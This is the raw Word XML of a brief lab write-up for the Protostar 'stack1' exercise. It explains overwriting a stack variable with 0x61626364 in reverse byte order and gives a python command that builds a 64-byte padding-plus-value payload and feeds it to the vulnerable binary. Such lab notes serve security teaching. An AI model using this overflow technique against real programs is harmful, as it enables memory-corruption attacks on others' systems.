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526B" w14:textId="1FC288F7" w:rsidR="0099153C" w:rsidRDefault="00891D8B" w:rsidP="00891D8B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Protostar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA5015">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0099153C">
        <w:t xml:space="preserve"> stack1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D33F7" w14:textId="77777777" w:rsidR="001A5689" w:rsidRDefault="001A5689" w:rsidP="001A5689"/>
    <w:p w14:paraId="0309BE9F" w14:textId="1E6AB078" w:rsidR="0099153C" w:rsidRDefault="0099153C" w:rsidP="0099153C">
      <w:r>
        <w:t xml:space="preserve">I need to overflow the buffer like in stack0, but I need to have </w:t>
      </w:r>
      <w:r w:rsidR="00112CC1">
        <w:t>“modified”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal 0x61626364 exactly. Because it is little endian, I need to insert them in reverse order.</w:t>
      </w:r>
      <w:r w:rsidR="00112CC1">
        <w:t xml:space="preserve"> I insert 64 ‘a’s like stack0, then I enter the specified number in reverse byte order with ‘\x’ to insert a hex number and not as a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E00BDA3" w14:textId="55F17406" w:rsidR="00447B15" w:rsidRDefault="00447B15" w:rsidP="0099153C"/>
    <w:p w14:paraId="2AFCDE07" w14:textId="0CFB894D" w:rsidR="00D63490" w:rsidRDefault="00D63490" w:rsidP="0099153C">
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E294E2" w14:textId="77777777" w:rsidR="0099153C" w:rsidRDefault="0099153C" w:rsidP="0099153C">
      <w:r>
        <w:t>python -c ‘print “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a”*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>64 + “\x64\x63\x62\x61”’ &gt; ~/mcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D556663" w14:textId="2F192A28" w:rsidR="00B16985" w:rsidRDefault="0099153C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>stack1 $(cat ~/mcc)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B1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26"/>
    <w:rsid w:val="00112CC1"/>
    <w:rsid w:val="001A5689"/>
    <w:rsid w:val="00447B15"/>
    <w:rsid w:val="00651E11"/>
    <w:rsid w:val="00891D8B"/>
    <w:rsid w:val="008D2F26"/>
    <w:rsid w:val="0099153C"/>
    <w:rsid w:val="00AA5015"/>
    <w:rsid w:val="00B16985"/>
    <w:rsid w:val="00D63490"/>
    <w:rsid w:val="00F0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1A58"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6502C937-5225-416B-92A2-840CE164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Labrum</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jonathan Labrum</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-03T20:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-03T20:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>